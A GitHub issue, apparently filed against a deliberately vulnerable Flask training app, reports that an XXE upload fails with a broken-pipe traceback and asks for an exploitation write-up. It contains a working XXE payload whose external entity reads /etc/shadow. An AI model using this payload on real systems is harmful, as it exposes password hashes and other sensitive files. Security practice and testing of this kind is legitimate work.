Bug issue with XXE upload

Hello, 

When i try to make XXE via upload with for example : 

Client side: 
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
<To>John</To>
<Subject>Doe</Subject>
<Content>Doe</Content>
<foo>&xxe;</foo>

Server side: 
Error on request:
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/werkzeug/serving.py", line 323, in run_wsgi
    execute(self.server.app)
  File "/usr/lib/python2.7/site-packages/werkzeug/serving.py", line 315, in execute
    write(data)
  File "/usr/lib/python2.7/site-packages/werkzeug/serving.py", line 273, in write
    self.send_response(code, msg)
  File "/usr/lib/python2.7/site-packages/werkzeug/serving.py", line 388, in send_response
    self.wfile.write(hdr.encode("ascii"))
IOError: [Errno 32] Broken pipe


In addition can you write write-up to know how to exploit every part of this flask ?. 
@lokori 


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Bug issue with XXE upload #2

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Bug issue with XXE upload #2

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions